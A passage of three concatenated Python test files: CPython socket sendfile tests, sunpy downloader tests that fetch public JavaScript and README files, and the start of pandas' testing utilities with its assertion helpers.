def testWithTimeoutTriggeredSend(self):
conn = self.accept_conn()
conn.recv(88192)
# errors
def _test_errors(self):
pass
def test_errors(self):
with open(support.TESTFN, 'rb') as file:
with socket.socket(type=socket.SOCK_DGRAM) as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(
ValueError, "SOCK_STREAM", meth, file)
with open(support.TESTFN, 'rt') as file:
with socket.socket() as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(
ValueError, "binary mode", meth, file)
with open(support.TESTFN, 'rb') as file:
with socket.socket() as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(TypeError, "positive integer",
meth, file, count='2')
self.assertRaisesRegex(TypeError, "positive integer",
meth, file, count=0.1)
self.assertRaisesRegex(ValueError, "positive integer",
meth, file, count=0)
self.assertRaisesRegex(ValueError, "positive integer",
meth, file, count=-1)
@unittest.skipUnless(thread, 'Threading required for this test.')
@unittest.skipUnless(hasattr(os, "sendfile"),
'os.sendfile() required for this test.')
class SendfileUsingSendfileTest(SendfileUsingSendTest):
"""
Test the sendfile() implementation of socket.sendfile().
"""
def meth_from_sock(self, sock):
return getattr(sock, "_sendfile_use_sendfile")
def test_main():
tests = [GeneralModuleTests, BasicTCPTest, TCPCloserTest, TCPTimeoutTest,
TestExceptions, BufferIOTest, BasicTCPTest2, BasicUDPTest, UDPTimeoutTest ]
tests.extend([
NonBlockingTCPTests,
FileObjectClassTestCase,
UnbufferedFileObjectClassTestCase,
LineBufferedFileObjectClassTestCase,
SmallBufferedFileObjectClassTestCase,
UnicodeReadFileObjectClassTestCase,
UnicodeWriteFileObjectClassTestCase,
UnicodeReadWriteFileObjectClassTestCase,
NetworkConnectionNoServer,
NetworkConnectionAttributesTest,
NetworkConnectionBehaviourTest,
ContextManagersTest,
InheritanceTest,
NonblockConstantTest
])
tests.append(BasicSocketPairTest)
tests.append(TestUnixDomain)
tests.append(TestLinuxAbstractNamespace)
tests.extend([TIPCTest, TIPCThreadableTest])
tests.extend([BasicCANTest, CANTest])
tests.extend([BasicRDSTest, RDSTest])
tests.extend([
CmsgMacroTests,
SendmsgUDPTest,
RecvmsgUDPTest,
RecvmsgIntoUDPTest,
SendmsgUDP6Test,
RecvmsgUDP6Test,
RecvmsgRFC3542AncillaryUDP6Test,
RecvmsgIntoRFC3542AncillaryUDP6Test,
RecvmsgIntoUDP6Test,
SendmsgTCPTest,
RecvmsgTCPTest,
RecvmsgIntoTCPTest,
SendmsgSCTPStreamTest,
RecvmsgSCTPStreamTest,
RecvmsgIntoSCTPStreamTest,
SendmsgUnixStreamTest,
RecvmsgUnixStreamTest,
RecvmsgIntoUnixStreamTest,
RecvmsgSCMRightsStreamTest,
RecvmsgIntoSCMRightsStreamTest,
# These are slow when setitimer() is not available
InterruptedRecvTimeoutTest,
InterruptedSendTimeoutTest,
TestSocketSharing,
SendfileUsingSendTest,
SendfileUsingSendfileTest,
])
thread_info = support.threading_setup()
support.run_unittest(*tests)
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
test_download.py
|
# -*- coding: utf-8 -*-
# Author: Florian Mayer <florian.mayer@bitsrc.org>
#pylint: disable=W0613
import pytest
import os
import tempfile
import threading
from functools import partial
import sunpy
from sunpy.net.download import Downloader, default_name
class CalledProxy(object):
def __init__(self, fn):
self.fn = fn
self.fired = False
def __call__(self, *args, **kwargs):
self.fn(*args, **kwargs)
self.fired = True
class MockConfig(object):
def __init__(self):
self.dct = {}
def add_section(self, name, dct):
self.dct[name] = dct
def get(self, one, other):
return self.dct[one][other]
def wait_for(n, callback): #pylint: disable=W0613
items = []
def _fun(handler):
items.append(handler)
if len(items) == n:
callback(items)
return _fun
def path_fun(*args, **kwargs):
raise ValueError
def get_and_create_temp_directory(tmpdir):
sunpy.config = MockConfig()
sunpy.config.add_section(
"downloads", {"download_dir": tmpdir}
)
if not os.path.isdir(sunpy.config.get('downloads', 'download_dir')):
os.makedirs(sunpy.config.get('downloads', 'download_dir'))
return sunpy.config.get('downloads', 'download_dir')
@pytest.mark.remote_data
def test_path_exception():
x = threading.Event()
dw = Downloader(1, 2)
dw.download(
"http://google.at", path_fun, errback=wait_for(1, lambda a: x.set())
)
th = threading.Thread(target=dw.wait)
th.daemon = True
th.start()
x.wait(10)
assert x.isSet()
dw.stop()
@pytest.mark.remote_data
def test_download_http():
items = []
lck = threading.Lock()
def wait_for(n, callback): # pylint: disable=W0613
def _fun(handler):
with lck:
items.append(handler)
if len(items) == n:
callback(items)
return _fun
tmp = tempfile.mkdtemp()
path_fun = partial(default_name, tmp)
dw = Downloader(1, 1)
_stop = lambda _: dw.stop()
timeout = CalledProxy(dw.stop)
timer = threading.Timer(60, timeout)
timer.start()
on_finish = wait_for(3, lambda _: dw.stop())
dw.download('http://ajax.googleapis.com/ajax/libs/jquery/2.0.0/jquery.min.js', path_fun, on_finish)
dw.download('http://ajax.googleapis.com/ajax/libs/webfont/1.4.2/webfont.js', path_fun, on_finish)
dw.download('https://raw.githubusercontent.com/sunpy/sunpy/master/README.rst', path_fun, on_finish)
dw.wait()
timer.cancel()
assert len(items) == 3
assert not timeout.fired
for item in items:
assert os.path.exists(item['path'])
@pytest.mark.remote_data
def test_download_default_dir():
_config = sunpy.config
try:
tmpdir = tempfile.mkdtemp()
path = get_and_create_temp_directory(tmpdir)
dw = Downloader(1, 1)
_stop = lambda _: dw.stop()
timeout = CalledProxy(dw.stop)
errback = CalledProxy(_stop)
dw.download(
'http://ajax.googleapis.com/ajax/libs/jquery/2.0.0/jquery.min.js',
path=path,
callback=_stop,
errback=errback
)
timer = threading.Timer(10, timeout)
timer.start()
dw.wait()
timer.cancel()
assert not timeout.fired
assert not errback.fired
assert os.path.exists(os.path.join(tmpdir, 'jquery.min.js'))
finally:
sunpy.config = _config
@pytest.mark.remote_data
def test_download_dir():
tmpdir = tempfile.mkdtemp()
dw = Downloader(1, 1)
_stop = lambda _: dw.stop()
timeout = CalledProxy(dw.stop)
errback = CalledProxy(_stop)
dw.download(
'http://ajax.googleapis.com/ajax/libs/jquery/2.0.0/jquery.min.js',
tmpdir,
callback=_stop,
errback=errback
)
timer = threading.Timer(10, timeout)
timer.start()
dw.wait()
timer.cancel()
assert not timeout.fired
assert not errback.fired
assert os.path.exists(os.path.join(tmpdir, 'jquery.min.js'))
|
_testing.py
|
import bz2
from collections import Counter
from contextlib import contextmanager
from datetime import datetime
from functools import wraps
import gzip
import operator
import os
import re
from shutil import rmtree
import string
import tempfile
from typing import Any, Callable, ContextManager, List, Optional, Type, Union, cast
import warnings
import zipfile
import numpy as np
from numpy.random import rand, randn
from pandas._config.localization import ( # noqa:F401
can_set_locale,
get_locales,
set_locale,
)
from pandas._libs.lib import no_default
import pandas._libs.testing as _testing
from pandas._typing import Dtype, FilePathOrBuffer, FrameOrSeries
from pandas.compat import get_lzma_file, import_lzma
from pandas.core.dtypes.common import (
is_bool,
is_categorical_dtype,
is_datetime64_dtype,
is_datetime64tz_dtype,
is_extension_array_dtype,
is_interval_dtype,
is_number,
is_numeric_dtype,
is_period_dtype,
is_sequence,
is_timedelta64_dtype,
needs_i8_conversion,
)
from pandas.core.dtypes.missing import array_equivalent
import pandas as pd
from pandas import (
Categorical,
CategoricalIndex,
DataFrame,
DatetimeIndex,
Index,
IntervalIndex,
MultiIndex,
RangeIndex,
Series,
bdate_range,
)
from pandas.core.algorithms import take_1d
from pandas.core.arrays import (
DatetimeArray,
ExtensionArray,
IntervalArray,
PeriodArray,
TimedeltaArray,
period_array,
)
from pandas.core.arrays.datetimelike import DatetimeLikeArrayMixin
from pandas.io.common import urlopen
from pandas.io.formats.printing import pprint_thing
lzma = import_lzma()
_N = 30
_K = 4
_RAISE_NETWORK_ERROR_DEFAULT = False
UNSIGNED_INT_DTYPES: List[Dtype] = ["uint8", "uint16", "uint32", "uint64"]
UNSIGNED_EA_INT_DTYPES: List[Dtype] = ["UInt8", "UInt16", "UInt32", "UInt64"]
SIGNED_INT_DTYPES: List[Dtype] = [int, "int8", "int16", "int32", "int64"]
SIGNED_EA_INT_DTYPES: List[Dtype] = ["Int8", "Int16", "Int32", "Int64"]
ALL_INT_DTYPES = UNSIGNED_INT_DTYPES + SIGNED_INT_DTYPES
ALL_EA_INT_DTYPES = UNSIGNED_EA_INT_DTYPES + SIGNED_EA_INT_DTYPES
FLOAT_DTYPES: List[Dtype] = [float, "float32", "float64"]
FLOAT_EA_DTYPES: List[Dtype] = ["Float32", "Float64"]
COMPLEX_DTYPES: List[Dtype] = [complex, "complex64", "complex128"]
STRING_DTYPES: List[Dtype] = [str, "str", "U"]
DATETIME64_DTYPES: List[Dtype] = ["datetime64[ns]", "M8[ns]"]
TIMEDELTA64_DTYPES: List[Dtype] = ["timedelta64[ns]", "m8[ns]"]
BOOL_DTYPES = [bool, "bool"]
BYTES_DTYPES = [bytes, "bytes"]
OBJECT_DTYPES = [object, "object"]
ALL_REAL_DTYPES = FLOAT_DTYPES + ALL_INT_DTYPES
ALL_NUMPY_DTYPES = (
ALL_REAL_DTYPES
+ COMPLEX_DTYPES
+ STRING_DTYPES
+ DATETIME64_DTYPES
+ TIMEDELTA64_DTYPES
+ BOOL_DTYPES
+ OBJECT_DTYPES
+ BYTES_DTYPES
)
# set testing_mode
_testing_mode_warnings = (DeprecationWarning, ResourceWarning)
def set_testing_mode():
# set the testing mode filters
testing_mode = os.environ.get("PANDAS_TESTING_MODE", "None")
if "deprecate" in testing_mode:
warnings.simplefilter("always", _testing_mode_warnings)
def reset_testing_mode():
# reset the testing mode filters
testing_mode = os.environ.get("PANDAS_TESTING_MODE", "None")
if "deprecate" in testing_mode:
warnings.simplefilter("ignore", _testing_mode_warnings)
set_testing_mode()
def reset_display_options():
"""
Reset the display options for printing and representing objects.
"""
pd.reset_option("^display.", silent=True)
def round_trip_pickle(
obj: Any, path: Optional[FilePathOrBuffer] = None
) -> FrameOrSeries:
"""
Pickle an object and then read it again.
Parameters
----------
obj : any object
The object to pickle and then re-read.
path : str, path object or file-like object, default None
The path where the pickled object is written and then read.
Returns
-------
pandas object
The original object that was pickled and then re-read.
"""
_path = path
if _path is None:
_path = f"__{rands(10)}__.pickle"
with ensure_clean(_path) as temp_path:
pd.to_pickle(obj, temp_path)
return pd.read_pickle(temp_path)
def round_trip_pathlib(writer, reader, path: Optional[str] = None):
"""
Write an object to file specified by a pathlib.Path and read it back
Parameters
----------
writer : callable bound to pandas object
IO writing function (e.g. DataFrame.to_csv )
reader : callable
IO reading function (e.g. pd.read_csv )
path : str, default None
The path where the object is written and then read.
Returns
-------
pandas object
The original object that was serialized and then re-read.
"""
import pytest
Path = pytest.importorskip("pathlib").Path
if path is None:
path = "___pathlib___"
with ensure_clean(path) as path:
writer(Path(path))
obj = reader(Path(path))
return obj
def round_trip_localpath(writer, reader, path: Optional[str] = None):
"""
Write an object to file specified by a py.path LocalPath and read it back.
Parameters
----------
writer : callable bound to pandas object
IO writing function (e.g. DataFrame.to_csv )
reader : callable
IO reading function (e.g. pd.read_csv )
path : str, default None
The path where the object is written and then read.
Returns
-------
pandas object
The original object that was serialized and then re-read.
"""
import pytest
LocalPath = pytest.importorskip("py.path").local
if path is None:
path = "___localpath___"
with ensure_clean(path) as path:
writer(LocalPath(path))
obj = reader(LocalPath(path))
return obj
@contextmanager
def decompress_file(path, compression):
"""
Open a compressed file and return a file object.
Parameters
----------
path : str
The path where the file is read from.
compression : {'gzip', 'bz2', 'zip', 'xz', None}
Name of the decompression to use
Returns
-------
file object
"""
if compression is None:
f = open(path, "rb")
elif compression == "gzip":
f = gzip.open(path, "rb")
elif compression == "bz2":
f = bz2.BZ2File(path, "rb")
elif compression == "xz":
f = get_lzma_file(lzma)(path, "rb")
elif compression == "zip":
zip_file = zipfile.ZipFile(path)
zip_names = zip_file.namelist()
if len(zip_names) == 1:
f = zip_file.open(zip_names.pop())
else:
raise ValueError(f"ZIP file {path} error. Only one file per ZIP.")
else:
raise ValueError(f"Unrecognized compression type: {compression}")
try:
yield f
finally:
f.close()
if compression == "zip":
zip_file.close()
def write_to_compressed(compression, path, data, dest="test"):
"""
Write data to a compressed file.
Parameters
----------
compression : {'gzip', 'bz2', 'zip', 'xz'}
The compression type to use.
path : str
The file path to write the data.
data : str
The data to write.
dest : str, default "test"
The destination file (for ZIP only)
Raises
------
ValueError : An invalid compression value was passed in.
"""
if compression == "zip":
compress_method = zipfile.ZipFile
elif compression == "gzip":
compress_method = gzip.GzipFile
elif compression == "bz2":
compress_method = bz2.BZ2File
elif compression == "xz":
compress_method = get_lzma_file(lzma)
else:
raise ValueError(f"Unrecognized compression type: {compression}")
if compression == "zip":
mode = "w"
args = (dest, data)
method = "writestr"
else:
mode = "wb"
args = (data,)
method = "write"
with compress_method(path, mode=mode) as f:
getattr(f, method)(*args)
def _get_tol_from_less_precise(check_less_precise: Union[bool, int]) -> float:
"""
Return the tolerance equivalent to the deprecated `check_less_precise`
parameter.
Parameters
----------
check_less_precise : bool or int
Returns
-------
float
Tolerance to be used as relative/absolute tolerance.
Examples
--------
>>> # Using check_less_precise as a bool:
>>> _get_tol_from_less_precise(False)
0.5e-5
>>> _get_tol_from_less_precise(True)
0.5e-3
>>> # Using check_less_precise as an int representing the decimal
>>> # tolerance intended:
>>> _get_tol_from_less_precise(2)
0.5e-2
>>> _get_tol_from_less_precise(8)
0.5e-8
"""
if isinstance(check_less_precise, bool):
if check_less_precise:
# 3-digit tolerance
return 0.5e-3
else:
# 5-digit tolerance
return 0.5e-5
else:
# Equivalent to setting checking_less_precise=<decimals>
return 0.5 * 10 ** -check_less_precise
def assert_almost_equal(
left,
right,
check_dtype: Union[bool, str] = "equiv",
check_less_precise: Union[bool, int] = no_default,
rtol: float = 1.0e-5,
atol: float = 1.0e-8,
**kwargs,
):
"""
Check that the left and right objects are approximately equal.
By approximately equal, we refer to objects that are numbers or that
contain numbers which may be equivalent to specific levels of precision.
Parameters
----------
left : object
right : object
check_dtype : bool or {'equiv'}, default 'equiv'
Check dtype if both a and b are the same type. If 'equiv' is passed in,
then `RangeIndex` and `Int64Index` are also considered equivalent
when doing type checking.
check_less_precise : bool or int, default False
Specify comparison precision. 5 digits (False) or 3 digits (True)
after decimal points are compared. If int, then specify the number
of digits to compare.
When comparing two numbers, if the first number has magnitude less
than 1e-5, we compare the two numbers directly and check whether
they are equivalent within the specified precision. Otherwise, we
compare the **ratio** of the second number to the first number and
check whether it is equivalent to 1 within the specified precision.
.. deprecated:: 1.1.0
Use `rtol` and `atol` instead to define relative/absolute
tolerance, respectively. Similar to :func:`math.isclose`.
rtol : float, default 1e-5
Relative tolerance.
.. versionadded:: 1.1.0
atol : float, default 1e-8
Absolute tolerance.
.. versionadded:: 1.1.0
"""
if check_less_precise is not no_default:
warnings.warn(
"The 'check_less_precise' keyword in testing.assert_*_equal "
"is deprecated and will be removed in a future version. "
"You can stop passing 'check_less_precise' to silence this warning.",
FutureWarning,
stacklevel=2,
)
rtol = atol = _get_tol_from_less_precise(check_less_precise)
if isinstance(left, pd.Index):
assert_index_equal(
left,
right,
check_exact=False,
exact=check_dtype,
rtol=rtol,
atol=atol,
**kwargs,
)
elif isinstance(left, pd.Series):
assert_series_equal(
left,
right,
check_exact=False,
check_dtype=check_dtype,
rtol=rtol,
atol=atol,
**kwargs,
)
elif isinstance(left, pd.DataFrame):
assert_frame_equal(
left,
right,
check_exact=False,
check_dtype=check_dtype,
rtol=rtol,
atol=atol,
**kwargs,
)
else:
# Other sequences.
if check_dtype:
if is_number(left) and is_number(right):
# Do not compare numeric classes, like np.float64 and float.
pass
elif is_bool(left) and is_bool(right):
# Do not compare bool classes, like np.bool_ and bool.
pass
else:
if isinstance(left, np.ndarray) or isinstance(right, np.ndarray):
obj = "numpy array"
else:
obj = "Input"
assert_class_equal(left, right, obj=obj)
_testing.assert_almost_equal(
left, right, check_dtype=check_dtype, rtol=rtol, atol=atol, **kwargs
)
def _check_isinstance(left, right, cls):
"""
Helper method for our assert_* methods that ensures that
the two objects being compared have the right type before
proceeding with the comparison.
Parameters
----------
left : The first object being compared.
right : The second object being compared.
cls : The class type to check against.
Raises
------
AssertionError : Either `left` or `right` is not an instance of `cls`.
"""
cls_name = cls.__name__
if not isinstance(left, cls):
raise AssertionError(
f"{cls_name} Expected type {cls}, found {type(left)} instead"
)
if not isinstance(right, cls):
raise AssertionError(
f"{cls_name} Expected type {cls}, found {type(right)} instead"
)
def assert_dict_equal(left, right, compare_keys: bool = True):
_check_isinstance(left, right, dict)
_testing.assert_dict_equal(left, right, compare_keys=compare_keys)
def randbool(size=(), p: float = 0.5):
return rand(*size) <= p
RANDS_CHARS = np.array(list(string.ascii_letters + string.digits), dtype=(np.str_, 1))
RANDU_CHARS = np.array(
list("".join(map(chr, range(1488, 1488 + 26))) + string.digits),
dtype=(np.unicode_, 1),
)
def rands_array(nchars, size, dtype="O"):
"""
Generate an array of byte strings.
"""
retval = (
np.random.choice(RANDS_CHARS, size=nchars * np.prod(size))
.view((np.str_, nchars))
.reshape(size)
)
return retval.astype(dtype)
def randu_array(nchars, size, dtype="O"):
"""
Generate an array of unicode strings.
"""
retval = (
np.random.choice(RANDU_CHARS, size=nchars * np.prod(size))
.view((np.unicode_, nchars))
.reshape(size)
)
return retval.astype(dtype)
def rands(nchars):
"""
Generate one random byte string.
See `rands_array` if you want to create an array of random strings.
"""
return "".join(np.random.choice(RANDS_CHARS, nchars))
def close(fignum=None):
from matplotlib.pyplot import close as _close, get_fignums
if fignum is None:
for fignum in get_fignums():
_close(fignum)
else:
_close(fignum)
# -----------------------------------------------------------------------------
# contextmanager to ensure the file cleanup
@contextmanager
def ensure_clean(filename=None, return_filelike=False, **kwargs):
"""
Gets a temporary path and agrees to remove on close.
Parameters
----------
filename : str (optional)
if None, creates a temporary file which is then removed when out of
scope. if passed, creates temporary file with filename as ending.
return_filelike : bool (default False)
if True, returns a file-like which is *always* cleaned. Necessary for
savefig and other functions which want to append extensions.
**kwargs
Additional keywords passed in for creating a temporary file.
:meth:`tempFile.TemporaryFile` is used when `return_filelike` is ``True``.
:meth:`tempfile.mkstemp` is used when `return_filelike` is ``False``.
Note that the `filename` parameter will be passed in as the `suffix`
argument to either function.
See Also
--------
tempfile.TemporaryFile
tempfile.mkstemp
"""
filename = filename or ""
fd = None
kwargs["suffix"] = filename
if return_filelike:
f = tempfile.TemporaryFile(**kwargs)
try:
yield f
finally:
f.close()
else:
# Don't generate tempfile if using a path with directory specified.
if len(os.path.dirname(filename)):
raise ValueError("Can't pass a qualified name to ensure_clean()")
try:
fd, filename = tempfile.mkstemp(**kwargs)
except UnicodeEncodeError:
import pytest
pytest.skip("no unicode file names on this system")
try:
yield filename
finally:
try:
os.close(fd)
except OSError:
print(f"Couldn't close file descriptor: {fd} (file: {filename})")
try:
if os.path.exists(filename):
os.remove(filename)
except OSError as e:
print(f"Exception on removing file: {e}")
@contextmanager
def ensure_clean_dir():
"""
Get a temporary directory path and agrees to remove on close.
Yields
------
Temporary directory path
"""
directory_name = tempfile.mkdtemp(suffix="")
try:
yield directory_name
finally:
try:
rmtree(directory_name)
except OSError:
pass
@contextmanager
def ensure_safe_environment_variables():
"""
Get a context manager to safely set environment variables
All changes will be undone on close, hence environment variables set
within this contextmanager will neither persist nor change global state.
"""
saved_environ = dict(os.environ)
try:
yield
finally:
os.environ.clear()
os.environ.update(saved_environ)
# -----------------------------------------------------------------------------
# Comparators
def equalContents(arr1, arr2) -> bool:
"""
Checks if the set of unique elements of arr1 and arr2 are equivalent.
"""
return frozenset(arr1) == frozenset(arr2)
def assert_index_equal(
left: Index,
right: Index,
exact: Union[bool, str] = "equiv",
check_names: bool = True,
check_less_precise: Union[bool, int] = no_default,
check_exact: bool = True,
check_categorical: bool = True,
check_order: bool = True,
rtol: float = 1.0e-5,
atol: float = 1.0e-8,
obj: str = "Index",
) -> None:
"""
Check that left and right Index are equal.
Parameters
----------
left : Index
right : Index
exact : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical. If 'equiv', then RangeIndex can be substituted for
Int64Index as well.
check_names : bool, default True
Whether to check the names attribute.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
.. deprecated:: 1.1.0
Use `rtol` and `atol` instead to define relative/absolute
tolerance, respectively. Similar to :func:`math.isclose`.
check_exact : bool, default True
Whether to compare number exactly.
check_categorical : bool, default True
Whether to compare internal Categorical exactly.
check_order : bool, default True
Whether to compare the order of index entries as well as their values.
If True, both indexes must contain the same elements, in the same order.
If False, both indexes must contain the same elements, but in any order.
.. versionadded:: 1.2.0
rtol : float, default 1e-5
Relative tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
atol : float, default 1e-8
Absolute tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
obj : str, default 'Index'
Specify object name being compared, internally used to show appropriate
assertion message.
"""
__tracebackhide__ = True
def _check_types(l, r, obj="Index"):
if exact:
assert_class_equal(l, r, exact=exact, obj=obj)
# Skip exact dtype checking when `check_categorical` is False
if check_categorical:
assert_attr_equal("dtype", l, r, obj=obj)
# allow string-like to have different inferred_types
if l.inferred_type in ("string"):
assert r.inferred_type in ("string")
else:
assert_attr_equal("inferred_type", l, r, obj=obj)
def _get_ilevel_values(index, level):
# accept level number only
unique = index.levels[level]
level_codes = index.codes[level]
filled = take_1d(unique._values, level_codes, fill_value=unique._na_value)
return unique._shallow_copy(filled, name=index.names[level])
if check_less_precise is not no_default:
warnings.warn(
"The 'check_less_precise' keyword in testing.assert_*_equal "
"is deprecated and will be removed in a future version. "
"You can stop passing 'check_less_precise' to silence this warning.",
FutureWarning,
stacklevel=2,
)
rtol = atol = _get_tol_from_less_precise(check_less_precise)
# instance validation
_check_isinstance(left, right, Index)
# class / dtype comparison
_check_types(left, right, obj=obj)
# level comparison
if left.nlevels != right.nlevels:
msg1 = f"{obj} levels are different"
msg2 = f"{left.nlevels}, {left}"
msg3 = f"{right.nlevels}, {right}"
raise_assert_detail(obj, msg1, msg2, msg3)
# length comparison
if len(left) != len(right):
msg1 = f"{obj} length are different"
msg2 = f"{len(left)}, {left}"
msg3 = f"{len(right)}, {right}"
raise_assert_detail(obj, msg1, msg2, msg3)
# If order doesn't matter then sort the index entries
if not check_order:
left = left.sort_values()
right = right.sort_values()
# MultiIndex special comparison for little-friendly error messages
if left.nlevels > 1:
left = cast(MultiIndex, left)
right = cast(MultiIndex, right)
for level in range(left.nlevels):
# cannot use get_level_values here because it can change dtype
llevel = _get_ilevel_values(left, level)
rlevel = _get_ilevel_values(right, level)
lobj = f"MultiIndex level [{level}]"
assert_index_equal(
llevel,
rlevel,
exact=exact,
check_names=check_names,
check_exact=check_exact,
rtol=rtol,
atol=atol,
obj=lobj,
)
# get_level_values may change dtype
_check_types(left.levels[level], right.levels[level], obj=obj)
# skip exact index checking when `check_categorical` is False
if check_exact and check_categorical:
if not left.equals(right):
diff = np.sum((left.values != right.values).astype(int)) * 100.0 / len(left)
msg = f"{obj} values are different ({np.round(diff, 5)} %)"
raise_assert_detail(obj, msg, left, right)
else:
_testing.assert_almost_equal(
left.values,
right.values,
rtol=rtol,
atol=atol,
check_dtype=exact,
obj=obj,
lobj=left,
robj=right,
)
# metadata comparison
if check_names:
assert_attr_equal("names", left, right, obj=obj)
if isinstance(left, pd.PeriodIndex) or isinstance(right, pd.PeriodIndex):
assert_attr_equal("freq", left, right, obj=obj)
if isinstance(left, pd.IntervalIndex) or isinstance(right, pd.IntervalIndex):
assert_interval_array_equal(left._values, right._values)
if check_categorical:
if is_categorical_dtype(left.dtype) or is_categorical_dtype(right.dtype):
assert_categorical_equal(left._values, right._values, obj=f"{obj} category")
def assert_class_equal(left, right, exact: Union[bool, str] = True, obj="Input"):
"""
Checks classes are equal.
"""
__tracebackhide__ = True
def repr_class(x):
if isinstance(x, Index):
# return Index as it is to include values in the error message
return x
return type(x).__name__
if exact == "equiv":
if type(left) != type(right):
# allow equivalence of Int64Index/RangeIndex
types = {type(left).__name__, type(right).__name__}
if len(types - {"Int64Index", "RangeIndex"}):
msg = f"{obj} classes are not equivalent"
raise_assert_detail(obj, msg, repr_class(left), repr_class(right))
elif exact:
if type(left) != type(right):
msg = f"{obj} classes are different"
raise_assert_detail(obj, msg, repr_class(left), repr_class(right))
def assert_attr_equal(attr: str, left, right, obj: str = "Attributes"):
"""
Check attributes are equal. Both objects must have attribute.
Parameters
----------
attr : str
Attribute name being compared.
left : object
right : object
obj : str, default 'Attributes'
Specify object name being compared, internally used to show appropriate
assertion message
"""
__tracebackhide__ = True
left_attr = getattr(left, attr)
right_attr = getattr(right, attr)
if left_attr is right_attr:
return True
elif (
is_number(left_attr)
and np.isnan(left_attr)
and is_number(right_attr)
and np.isnan(right_attr)
):
# np.nan
return True
try:
result = left_attr == right_attr
except TypeError:
# datetimetz on rhs may raise TypeError
result = False
if not isinstance(result, bool):
result = result.all()
if result:
return True
else:
msg = f'Attribute "{attr}" are different'
raise_assert_detail(obj, msg, left_attr, right_attr)
def assert_is_valid_plot_return_object(objs):
import matplotlib.pyplot as plt
if isinstance(objs, (pd.Series, np.ndarray)):
for el in objs.ravel():
msg = (
"one of 'objs' is not a matplotlib Axes instance, "
f"type encountered {repr(type(el).__name__)}"
)
assert isinstance(el, (plt.Axes, dict)), msg
else:
msg = (
"objs is neither an ndarray of Artist instances nor a single "
"ArtistArtist instance, tuple, or dict, 'objs' is a "
f"{repr(type(objs).__name__)}"
)
assert isinstance(objs, (plt.Artist, tuple, dict)), msg
def assert_is_sorted(seq):
"""Assert that the sequence is sorted."""
if isinstance(seq, (Index, Series)):
seq = seq.values
# sorting does not change precisions
assert_numpy_array_equal(seq, np.sort(np.array(seq)))
def assert_categorical_equal(
left, right, check_dtype=True, check_category_order=True, obj="Categorical"
):
"""
Test that Categoricals are equivalent.
Parameters
----------
left : Categorical
right : Categorical
check_dtype : bool, default True
Check that integer dtype of the codes are the same
check_category_order : bool, default True
Whether the order of the categories should be compared, which
implies identical integer codes. If False, only the resulting
values are compared. The ordered attribute is
checked regardless.
obj : str, default 'Categorical'
Specify object name being compared, internally used to show appropriate
assertion message
"""
_check_isinstance(left, right, Categorical)
if check_category_order:
assert_index_equal(left.categories, right.categories, obj=f"{obj}.categories")
assert_numpy_array_equal(
left.codes, right.codes, check_dtype=check_dtype, obj=f"{obj}.codes"
)
else:
try:
lc = left.categories.sort_values()
rc = right.categories.sort_values()
except TypeError:
# e.g. '<' not supported between instances of 'int' and 'str'
lc, rc = left.categories, right.categories
assert_index_equal(lc, rc, obj=f"{obj}.categories")
assert_index_equal(
left.categories.take(left.codes),
right.categories.take(right.codes),
obj=f"{obj}.values",
)
assert_attr_equal("ordered", left, right, obj=obj)
def assert_interval_array_equal(left, right, exact="equiv", obj="IntervalArray"):
"""
Test that two IntervalArrays are equivalent.
Parameters
----------
left, right : IntervalArray
The IntervalArrays to compare.
exact : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical. If 'equiv', then RangeIndex can be substituted for
Int64Index as well.
obj : str, default 'IntervalArray'
Specify object name being compared, internally used to show appropriate
assertion message
"""
_check_isinstance(left, right, IntervalArray)
kwargs = {}
if left._left.dtype.kind in ["m", "M"]:
# We have a DatetimeArray or TimedeltaArray
kwargs["check_freq"] = False
assert_equal(left._left, right._left, obj=f"{obj}.left", **kwargs)
assert_equal(left._right, right._right, obj=f"{obj}.left", **kwargs)
assert_attr_equal("closed", left, right, obj=obj)
def assert_period_array_equal(left, right, obj="PeriodArray"):
_check_isinstance(left, right, PeriodArray)
assert_numpy_array_equal(left._data, right._data, obj=f"{obj}._data")
assert_attr_equal("freq", left, right, obj=obj)
def assert_datetime_array_equal(left, right, obj="DatetimeArray", check_freq=True):
__tracebackhide__ = True
_check_isinstance(left, right, DatetimeArray)
assert_numpy_array_equal(left._data, right._data, obj=f"{obj}._data")
if check_freq:
assert_attr_equal("freq", left, right, obj=obj)
assert_attr_equal("tz", left, right, obj=obj)
def assert_timedelta_array_equal(left, right, obj="TimedeltaArray", check_freq=True):
__tracebackhide__ = True
_check_isinstance(left, right, TimedeltaArray)
assert_numpy_array_equal(left._data, right._data, obj=f"{obj}._data")
if check_freq:
assert_attr_equal("freq", left, right, obj=obj)
def raise_assert_detail(obj, message, left, right, diff=None, index_values=None):
__tracebackhide__ = True
msg = f"""{obj} are different
{message}"""
if isinstance(index_values, np.ndarray):
msg += f"\n[index]: {pprint_thing(index_values)}"
if isinstance(left, np.ndarray):
left = pprint_thing(left)
elif is_categorical_dtype(left):
left = repr(left)
if isinstance(right, np.ndarray):
right = pprint_thing(right)
elif is_categorical_dtype(right):
right = repr(right)
msg += f"""
[left]: {left}
[right]: {right}"""
if diff is not None:
msg += f"\n[diff]: {diff}"
raise AssertionError(msg)
def assert_numpy_array_equal(
left,
right,
strict_nan=False,
check_dtype=True,
err_msg=None,
check_same=None,
obj="numpy array",
index_values=None,
):
"""
Check that 'np.ndarray' is equivalent.
Parameters
----------
left, right : numpy.ndarray or iterable
The two arrays to be compared.
strict_nan : bool, default False
If True, consider NaN and None to be different.
check_dtype : bool, default True
Check dtype if both a and b are np.ndarray.
err_msg : str, default None
If provided, used as assertion message.
check_same : None|'copy'|'same', default None
Ensure left and right refer/do not refer to the same memory area.
obj : str, default 'numpy array'
Specify object name being compared, internally used to show appropriate
assertion message.
index_values : numpy.ndarray, default None
optional index (shared by both left and right), used in output.
"""
__tracebackhide__ = True
# instance validation
# Show a detailed error message when classes are different
assert_class_equal(left, right, obj=obj)
# both classes must be an np.ndarray
_check_isinstance(left, right, np.ndarray)
def _get_base(obj):
return obj.base if getattr(obj, "base", None) is not None else obj
